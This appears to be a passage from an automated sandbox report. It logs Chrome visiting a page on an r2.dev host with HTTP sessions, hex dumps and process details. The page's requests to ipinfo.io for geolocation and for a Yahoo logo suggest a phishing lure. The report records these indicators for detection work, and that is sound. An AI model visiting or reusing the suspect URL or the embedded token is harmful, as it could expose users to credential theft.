                      2024-07-04 22:30:27 UTC1369INData Raw: ac 42 0b 6a 90 bb e6 76 aa bb 25 ba 03 b5 c5 b4 71 9e 24 ce 02 69 20 9e 7a 5d dc 7f ac a8 d2 c9 4d a6 5e 49 c7 45 b7 00 6f e3 40 b7 e4 ee bc fa 67 44 87 00 68 0c 79 95 4f 33 b3 db 24 ed 1c dd 82 ba b5 8f 2c bd eb 1c 0d 70 fb 45 fc 99 a2 4a 27 6f b0 e6 87 e4 d6 29 2e af 0f 6c 81 1d 20 d3 8f f2 49 69 f9 59 ea de 25 ba 06 78 3b ed 2a 1d be e9 aa 1b 7e a1 78 cf 10 d8 92 9d 65 7e 59 c1 ca 77 15 55 3e 24 3a 06 18 4b 1b d4 fc 59 49 ef 8d ee 40 46 98 ba 56 a8 f5 d5 e8 8c 5a 33 a2 33 8f cd b9 0a 47 03 db 71 f3 37 5b e0 3f 99 58 4f 36 96 81 e5 9a 79 4f 74 c4 b6 68 d3 ca 5c 51 a5 45 6e fa 81 24 de f4 42 ad db dd 2c fd f1 3c f5 1f 13 1d 02 a0 be 15 55 3a d3 cc af 97 34 31 ba 05 75 6f af 9c 0d ad 66 c4 81 37 14 d5 bb 53 21 e9 bb ca 4d b7 48 da 2b ba 07 a8 71 66 ae f6
                      Data Ascii: Bjv%q$i z]M^IEo@gDhyO3$,pEJ'o).l IiY%x;*~xe~YwU>$:KYI@FVZ33Gq7[?XO6yOth\QEn$B,<U:41uof7S!MH+qf
                      2024-07-04 22:30:27 UTC1369INData Raw: 87 6d c3 1a 49 a7 47 b7 00 0d e8 f8 d4 72 bd 79 95 8f 8e 0e 01 46 c2 4d 0b a2 1b 90 1d c3 a9 b1 35 78 17 a3 1e 70 bc a6 57 af 91 f4 fb 31 68 41 ed 4b 06 95 2b 06 37 20 40 a7 ba 77 94 db 19 d1 1d a8 1e 77 bf 2c 2b f7 1f 2b aa f7 fd 6e 7e a7 a4 f7 46 b7 00 d5 61 27 4a 6a 8e ae 00 90 09 d6 64 2d 5d 92 0e 89 0e 01 de 89 99 2e 2d aa f7 fd d1 1d d8 76 79 95 ce 95 25 77 4a 7a 4f 74 0b d0 c0 8e 74 4b ba db d5 77 52 74 08 b2 eb 4d 63 bc c3 a3 5b 80 06 b6 a7 99 df 9d 57 f9 ab d1 21 c0 3b e9 50 cf 7b 4d 3a 35 ba 03 99 f1 c8 0a 4d bf 3b 3a a2 d6 8d 7a c0 b1 4a c7 bc e6 a6 2b c7 22 06 b5 cf 4c f3 b9 47 71 e3 79 5d cd 73 25 4d 8a ee 40 d5 0c 49 7e 45 74 c4 48 e4 d5 f7 11 b7 e4 0e 49 bb 44 b7 00 00 50 83 76 92 fc d3 d1 11 c0 08 4c 70 cb 7d af 43 3d 0c 72 33 aa 4d 2b 73
                      Data Ascii: mIGryFM5xpW1hAK+7 @ww,++n~Fa'Jjd-].-vy%wJzOttKwRtMc[W!;P{M:5M;:zJ+"LGqy]s%M@I~EtHIDPvLp}C=r3M+s


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                      4           192.168.2.4  49747        184.28.90.27    443
                      Timestamp                Bytes transferred  Direction  Data
                      2024-07-04 22:30:27 UTC  161                OUT        HEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-07-04 22:30:27 UTC  466                IN         HTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/0758)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-eus-z1
                      Cache-Control: public, max-age=30815
                      Date: Thu, 04 Jul 2024 22:30:27 GMT
                      Connection: close
                      X-CID: 2


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                      5           192.168.2.4  49750        104.18.2.35     443               8    C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2024-07-04 22:30:28 UTC  693                OUT        GET /images/download_afD_icon.ico HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC  180                IN         HTTP/1.1 404 Not Found
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Type: text/html
                      Content-Length: 27150
                      Connection: close
                      Server: cloudflare
                      CF-RAY: 89e28f5d68df423a-EWR


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                      6           192.168.2.4  49751        34.117.186.192  443               8    C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2024-07-04 22:30:28 UTC  661                OUT        GET /json?token=5eaf0700b2c0d2 HTTP/1.1
                      Host: ipinfo.io
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      Accept: application/json, text/javascript, */*; q=0.01
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Origin: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC  513                IN         HTTP/1.1 200 OK
                      server: nginx/1.24.0
                      date: Thu, 04 Jul 2024 22:30:28 GMT
                      content-type: application/json; charset=utf-8
                      Content-Length: 274
                      access-control-allow-origin: *
                      x-frame-options: SAMEORIGIN
                      x-xss-protection: 1; mode=block
                      x-content-type-options: nosniff
                      referrer-policy: strict-origin-when-cross-origin
                      x-envoy-upstream-service-time: 3
                      via: 1.1 google
                      strict-transport-security: max-age=2592000; includeSubDomains
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-07-04 22:30:28 UTC274INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                      Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                      7           192.168.2.4  49752        104.26.6.17     443               8    C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp                Bytes transferred  Direction  Data
                      2024-07-04 22:30:28 UTC  383                OUT        GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1
                      Host: logodownload.org
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC  637                IN         HTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Type: image/png
                      Content-Length: 57304
                      Connection: close
                      Last-Modified: Wed, 12 Aug 2020 20:27:15 GMT
                      Cache-Control: max-age=31536000
                      CF-Cache-Status: HIT
                      Age: 43927
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGynlNwmc5VYHG1s2x9Svbff5Ru%2Fcg0ovYoPbishQlU%2Fzuc3dVOxBCHp1JCSd10Tg7GdfgklJLCmLCgfVeKNAwE%2BRz6BxXOttlk09hn%2FrMt%2FPviX1FrhccF4KjqwehtbaSM%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 89e28f5dcfab8c71-EWR


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                      8           192.168.2.4  49749        184.28.90.27    443
                      Timestamp                Bytes transferred  Direction  Data
                      2024-07-04 22:30:28 UTC  239                OUT        GET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-07-04 22:30:28 UTC | 514 | IN | HTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=30835
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-07-04 22:30:28 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.4 | 49753 | 34.117.186.192 | 443 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-04 22:30:29 UTC | 358 | OUT | GET /json?token=5eaf0700b2c0d2 HTTP/1.1
                      Host: ipinfo.io
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:29 UTC | 513 | IN | HTTP/1.1 200 OK
                      server: nginx/1.24.0
                      date: Thu, 04 Jul 2024 22:30:29 GMT
                      content-type: application/json; charset=utf-8
                      Content-Length: 274
                      access-control-allow-origin: *
                      x-frame-options: SAMEORIGIN
                      x-xss-protection: 1; mode=block
                      x-content-type-options: nosniff
                      referrer-policy: strict-origin-when-cross-origin
                      x-envoy-upstream-service-time: 2
                      via: 1.1 google
                      strict-transport-security: max-age=2592000; includeSubDomains
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-07-04 22:30:29 UTC | 274 | IN
                      Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "



                      Target ID:0
                      Start time:18:30:15
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:18:30:21
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:18:30:22
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly